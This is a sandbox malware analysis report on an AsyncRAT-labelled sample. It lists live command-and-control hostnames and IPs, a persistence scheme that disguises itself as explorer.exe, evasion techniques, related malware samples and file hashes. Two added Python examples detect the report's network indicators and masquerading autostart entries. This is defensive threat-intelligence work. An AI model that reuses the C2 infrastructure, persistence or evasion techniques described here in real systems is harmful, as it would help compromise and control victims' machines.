            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\explorer.exe; Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C17F000.00000004.00000020.00020000.00000000.sdmp, Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C13E000.00000004.00000020.00020000.00000000.sdmp, Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C0D0000.00000004.00000020.00020000.00000000.sdmp, Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C12F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Zvas34nq1T.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Zvas34nq1T.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Zvas34nq1T.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: Zvas34nq1T.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Zvas34nq1T.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED
MITRE ATT&CK Matrix

Techniques flagged by the report, grouped by tactic column; the number in parentheses is the count badge drawn next to the technique in the report. All other cells of the matrix hold the standard, unflagged technique list.

Execution: Windows Management Instrumentation (11); PowerShell (1)
Persistence: Registry Run Keys / Startup Folder (21); DLL Side-Loading (1)
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1)
Defense Evasion: Masquerading (11); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (131); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1)
Discovery: Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Collection: Archive Collected Data (11)
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no technique flagged
Behavior Graph (ID 1543338, sample Zvas34nq1T.exe, start date 27/10/2024, architecture WINDOWS, score 100), rendered as a process tree:

Start
  Hosts resolved: have-lucia.gl.at.ply.gg; develop-versions.gl.at.ply.gg
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 11 other signatures
  Zvas34nq1T.exe (started; graph counters 1 5)
    Network: develop-versions.gl.at.ply.gg 147.185.221.21, ports 49789, 49864, 65059, SALSGIVERUS, United States; have-lucia.gl.at.ply.gg 147.185.221.23, ports 49928, 49998, 50010, SALSGIVERUS, United States; 127.0.0.1 unknown unknown
    Dropped: C:\Users\user\AppData\Roaming\explorer.exe, PE32
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 2 other signatures
    powershell.exe (started, 4 instances; graph counters 22, 23, 23, 23)
      Signature (first instance): Loading BitLocker PowerShell Module
      conhost.exe (started, one per powershell.exe instance)
  explorer.exe (started, 2 instances)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

Source | Detection | Scanner | Label
Zvas34nq1T.exe | 89% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
Zvas34nq1T.exe | 100% | Avira | HEUR/AGEN.1305769
Zvas34nq1T.exe | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\explorer.exe | 100% | Avira | HEUR/AGEN.1305769
C:\Users\user\AppData\Roaming\explorer.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\explorer.exe | 89% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
develop-versions.gl.at.ply.gg | 147.185.221.21 | true | true | - | unknown
have-lucia.gl.at.ply.gg | 147.185.221.23 | true | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
have-lucia.gl.at.ply.gg | true | - | unknown
develop-versions.gl.at.ply.gg | true | - | unknown
develop-versions.gl.at.ply.gg:65059 | true | - | unknown
127.0.0.1 | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micros4 | powershell.exe, 00000004.00000002.1895371135.0000016078CD6000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Zvas34nq1T.exe, 00000000.00000002.2947487566.0000000003171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://crl.micros | powershell.exe, 00000001.00000002.1781097013.00000150472B2000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.21 | develop-versions.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
147.185.221.23 | have-lucia.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true

IP (loopback)
127.0.0.1
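Added example, not code from Joe Sandbox or from this report: a small Python matcher that applies the network indicators in the tables above to endpoint connection records. It goes one step beyond the two hostnames the report names by treating any host under .ply.gg as a playit.gg tunnel endpoint, and, as an assumption for this example only, treats the 147.185.221.0/24 netblock as related because the report's context table lists other XWorm samples on .21, .22 and .23. The record layout and the log lines are constructed; the report gives 65059 as the remote port for develop-versions.gl.at.ply.gg but no port for have-lucia.gl.at.ply.gg, so the port on that line is made up. Loopback and other non-global addresses (the report's 127.0.0.1 entry) are skipped rather than matched.

```python
"""Match connection records against this report's network IOCs.

Added example for the Joe Sandbox report on Zvas34nq1T.exe; not Joe Sandbox
code.  Record format, sample lines and the /24 heuristic are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators copied from the report's domain/IP tables.
REPORT_DOMAINS = {
    "develop-versions.gl.at.ply.gg": "147.185.221.21",
    "have-lucia.gl.at.ply.gg": "147.185.221.23",
}
REPORT_IPS = set(REPORT_DOMAINS.values())
REPORT_PORTS = {65059}                      # the only remote port the report names

# Generalisation: *.ply.gg hosts are playit.gg tunnel endpoints, so a new
# subdomain on the same service is still worth flagging.
TUNNEL_SUFFIXES = (".ply.gg",)

# Assumption for this example: the report's context table shows other XWorm
# samples on 147.185.221.21/.22/.23, so the /24 is treated as related.
RELATED_NETS = [ipaddress.ip_network("147.185.221.0/24")]

# Constructed record layout: "<utc> <image> <pid> <dst_host|-> <dst_ip> <dst_port>"
NETCONN_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)$")


@dataclass(frozen=True)
class Hit:
    line_no: int
    image: str
    reasons: Tuple[str, ...]


def parse_netconn(line: str) -> Optional[dict]:
    """Parse one constructed record; None if the line is not a record."""
    m = NETCONN_RE.match(line.strip())
    if not m:
        return None
    ts, image, pid, host, ip, port = m.groups()
    return {"ts": ts, "image": image, "pid": int(pid),
            "host": None if host == "-" else host.lower().rstrip("."),
            "ip": ipaddress.ip_address(ip), "port": int(port)}


def classify(rec: dict) -> List[str]:
    """Every reason the record matches the report's IOCs; empty if none."""
    reasons: List[str] = []
    ip, host, port = rec["ip"], rec["host"], rec["port"]
    if not ip.is_global:            # loopback, RFC1918, documentation ranges
        return reasons
    if host in REPORT_DOMAINS:
        reasons.append(f"domain {host} is a report IOC")
    if str(ip) in REPORT_IPS:
        reasons.append(f"ip {ip} is a report IOC")
    if host and host.endswith(TUNNEL_SUFFIXES):
        reasons.append(f"host {host} is a playit.gg tunnel endpoint")
    if str(ip) not in REPORT_IPS and any(ip in net for net in RELATED_NETS):
        reasons.append(f"ip {ip} is in a netblock related to the report IOCs")
    # A port alone is too weak to alert on; only add it to an existing match.
    if port in REPORT_PORTS and reasons:
        reasons.append(f"port {port} matches the report C2 port")
    return reasons


def scan(lines: List[str]) -> List[Hit]:
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        rec = parse_netconn(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append(Hit(n, rec["image"], tuple(reasons)))
    return hits


# Constructed sample log.  Line 2's port and every non-report host/IP are made up.
SAMPLE_LOG = [
    "2024-10-27T17:06:12Z Zvas34nq1T.exe 7276 develop-versions.gl.at.ply.gg 147.185.221.21 65059",
    "2024-10-27T17:06:40Z Zvas34nq1T.exe 7276 have-lucia.gl.at.ply.gg 147.185.221.23 7000",
    "2024-10-27T17:06:41Z Zvas34nq1T.exe 7276 - 127.0.0.1 49789",
    "2024-10-27T17:07:30Z chrome.exe 4120 www.example.com 203.0.113.10 443",
    "2024-10-27T17:08:02Z explorer.exe 7440 other-name.gl.at.ply.gg 147.185.221.22 9001",
    "2024-10-27T17:08:05Z svchost.exe 1200 ctldl.windowsupdate.com 203.0.113.20 80",
    "this line is not a connection record",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no} {hit.image}: " + "; ".join(hit.reasons))
```

Lines 1, 2 and 5 of the sample are reported; line 5 is caught only by the tunnel-suffix and netblock rules, which is the point of generalising past the two hostnames. Swap `parse_netconn` for a parser of your own telemetry (Sysmon event 3, Zeek conn.log) and keep `classify` as it is.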
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543338
                                Start date and time:2024-10-27 18:05:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Zvas34nq1T.exe
                                renamed because original name is a hash value
                                Original Sample Name:95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@15/20@2/3
                                EGA Information:
                                • Successful, ratio: 14.3%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 59
                                • Number of non-executed functions: 4
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target explorer.exe, PID 5328 because it is empty
                                • Execution Graph export aborted for target explorer.exe, PID 7440 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7368 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: Zvas34nq1T.exe
Time | Type | Description
13:06:06 | API Interceptor | 62x Sleep call for process: powershell.exe modified
13:07:10 | API Interceptor | 120442x Sleep call for process: Zvas34nq1T.exe modified
17:07:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
17:07:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
17:07:19 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
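Added example, not code from Joe Sandbox or from this report: the check a responder would run over collected autostart entries to catch what the timeline above shows, a Run value and a Startup folder shortcut both named "explorer" that start an explorer.exe from %AppData% instead of C:\Windows. The two malicious entries are built from the timeline; the benign and edge-case entries, the list of Windows process names, the expected directories and the environment map are assumptions for the example.

```python
"""Flag autostart entries whose image carries a Windows system process name
but lives outside the directory that process belongs in.

Added example for the Joe Sandbox report on Zvas34nq1T.exe; not Joe Sandbox
code.  Entries, name list, expected directories and ENV are constructed.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Image names that belong to Windows itself (assumed list for the example).
SYSTEM_PROCESS_NAMES = {
    "explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
    "services.exe", "smss.exe", "wininit.exe", "dllhost.exe", "taskhostw.exe",
    "spoolsv.exe", "conhost.exe", "runtimebroker.exe",
}

# Where the genuine binaries live (lower-case, no trailing backslash).
DEFAULT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
EXPECTED_DIRS = {"explorer.exe": {r"c:\windows"}}

# Constructed environment so %VAR% references expand offline on any platform.
ENV = {
    "systemroot": r"C:\Windows",
    "windir": r"C:\Windows",
    "appdata": r"C:\Users\user\AppData\Roaming",
    "localappdata": r"C:\Users\user\AppData\Local",
    "programfiles": r"C:\Program Files",
}


@dataclass(frozen=True)
class AutostartEntry:
    location: str   # registry key, "Startup folder", task name, ...
    name: str       # value name or .lnk name
    command: str    # command line or shortcut target as stored


def expand_env(path: str) -> str:
    return re.sub(r"%([^%]+)%",
                  lambda m: ENV.get(m.group(1).lower(), m.group(0)), path)


def image_path(command: str) -> str:
    """Extract the executable from a Run-style command line and normalise it."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        exe = cmd[1:end] if end > 0 else cmd[1:]
    else:
        # Unquoted: stop at the first ".exe" token so unquoted paths that
        # contain spaces are still recovered intact.
        m = re.match(r"(.+?\.exe)(?:\s|$)", cmd, re.IGNORECASE)
        exe = m.group(1) if m else cmd.split()[0]
    return ntpath.normpath(expand_env(exe))


def masquerade_reason(entry: AutostartEntry) -> Optional[str]:
    """Explain why the entry looks like a masquerading system process, or None."""
    path = image_path(entry.command)
    image = ntpath.basename(path).lower()
    if image not in SYSTEM_PROCESS_NAMES:
        return None
    directory = ntpath.dirname(path).lower()
    allowed = EXPECTED_DIRS.get(image, DEFAULT_DIRS)
    if directory in allowed:
        return None
    return (f"{entry.location}\\{entry.name}: {image} started from "
            f"{directory!r}, expected one of {sorted(allowed)}")


def scan(entries: List[AutostartEntry]) -> List[str]:
    return [r for r in map(masquerade_reason, entries) if r]


# Constructed sample set: the two persistence artefacts from the report's
# timeline, three benign entries and one further masquerade for contrast.
SAMPLE_ENTRIES = [
    AutostartEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "explorer",
                   r"C:\Users\user\AppData\Roaming\explorer.exe"),
    AutostartEntry("Startup folder", "explorer.lnk", r"%APPDATA%\explorer.exe"),
    AutostartEntry(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
                   r"%windir%\system32\SecurityHealthSystray.exe"),
    AutostartEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
                   r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    AutostartEntry("Winlogon", "Shell", r"C:\Windows\explorer.exe"),
    AutostartEntry("Scheduled task", "Updater",
                   r"C:\Users\user\AppData\Local\Temp\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_ENTRIES):
        print(finding)
```

The genuine explorer.exe under C:\Windows passes, the two report entries and the Temp\svchost.exe task are flagged. On a live host the entries come from the Run/RunOnce keys, the user and common Startup folders (resolve each .lnk to its target first) and the task scheduler; the check itself does not change.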
Match | Associated Sample Name / URL | Detection | Threat Name
147.185.221.21 | aoKTzGQSRP.exe | malicious | XWorm
147.185.221.21 | SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exe | malicious | SheetRat
147.185.221.21 | mIURiU8n2P.exe | malicious | XWorm
147.185.221.21 | PixpFUv4G7.exe | malicious | Quasar, XWorm
147.185.221.21 | r4RF3TX5Mi.exe | malicious | XWorm
147.185.221.21 | ra66DSpa.exe | malicious | XWorm
147.185.221.21 | Q5N7WOpk8J.bat | malicious | Unknown
147.185.221.21 | NzEsfIiAc0.exe | malicious | XWorm
147.185.221.21 | Y666Gn09a1.exe | malicious | XWorm
147.185.221.21 | Uhj9qfwbYG.exe | malicious | AsyncRAT, XWorm
147.185.221.23 | fMdcaIZWzT.exe | malicious | XWorm
147.185.221.23 | vtuLkV5KEW.exe | malicious | XWorm
147.185.221.23 | IGznKtHyTp.exe | malicious | XWorm
147.185.221.23 | 6PJia32WYA.exe | malicious | Njrat
147.185.221.23 | lx3vLwrX57.exe | malicious | XWorm
147.185.221.23 | SpeedHack666Cheat (no VM detected).exe | malicious | Njrat, RevengeRAT
147.185.221.23 | 8svMXMXNRn.exe | malicious | NoCry, XWorm
147.185.221.23 | 7yJsmmW4wS.exe | malicious | XWorm
147.185.221.23 | I8YtUAUWeS.exe | malicious | XWorm
147.185.221.23 | s3OBQLA3xR.exe | malicious | XWorm
                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SALSGIVERUS | fMdcaIZWzT.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | vtuLkV5KEW.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | IGznKtHyTp.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | arm7.elf | malicious | Mirai | 147.184.222.141
SALSGIVERUS | la.bot.powerpc.elf | malicious | Unknown | 147.168.56.86
SALSGIVERUS | 6PJia32WYA.exe | malicious | Njrat | 147.185.221.23
SALSGIVERUS | aoKTzGQSRP.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | BWoiYc9WwI.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | fjijTlM2tu.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exe | malicious | SheetRat | 147.185.221.21
                                                                        No context
                                                                        No context
                                                                        Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\Desktop\Zvas34nq1T.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 27 16:07:01 2024, mtime=Sun Oct 27 16:07:01 2024, atime=Sun Oct 27 16:07:01 2024, length=36864, window=hide
Category: dropped
Size (bytes): 771
Entropy (8bit): 5.0278556278345485
Encrypted: false
SSDEEP: 12:8xIi4yVlSWChddY///js2LMyytjAQrH/DZL1gZgzBmV:8kglNw+AgMhJAQbFL1QABm
MD5: EA7D06210A5FA2F7A87FC82A2E10C077
SHA1: 61416764E6FC6E54EE71761CD5847CA7F814E73D
SHA-256: 7CC7CB63E4AC868DF2BD6C8922EFB2A45ED96EEE8DA9DABFF208A666A0387D6B
SHA-512: 90CA12A43CB1F667161BE5129E78C26273F33F90EF1DCB53AF9319D32B57512B322388702E12CC566EC4B0BC16C3CC5712243E6DED1C8F2AA143A7EA517F8760
Malicious: false
                                                                        Preview:L..................F.... ....=..(...=..(...=..(..........................z.:..DG..Yr?.D..U..k0.&...&......vk.v.....Iv|.(......(......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^[Y.............................%..A.p.p.D.a.t.a...B.V.1.....[Y....Roaming.@......CW.^[Y..............................7.R.o.a.m.i.n.g.....f.2.....[Y. .explorer.exe..J......[Y.[Y...........................?.5.e.x.p.l.o.r.e.r...e.x.e.......Z...............-.......Y..............%.....C:\Users\user\AppData\Roaming\explorer.exe........\.....\.....\.....\.....\.e.x.p.l.o.r.e.r...e.x.e.`.......X.......302494...........hT..CrF.f4... .X......,.......hT..CrF.f4... .X......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Process: C:\Users\user\Desktop\Zvas34nq1T.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 36864
Entropy (8bit): 5.564386838220718
Encrypted: false
SSDEEP: 768:VSjIY2VJO7RWR6nhP7Irb5Fyl98T6YOjhYF9:VwIPwWR6nhP0RFQ98T6YOjM
MD5: 3830EA8C8B7A7730A6446CA3C8A61180
SHA1: CF9E202A5D5139E7E5EE375653397F0DBD5B11A6
SHA-256: 95E1104DF5D9080402316949DE1137C886F9D53D884CEE12D10AF499F41D5AC1
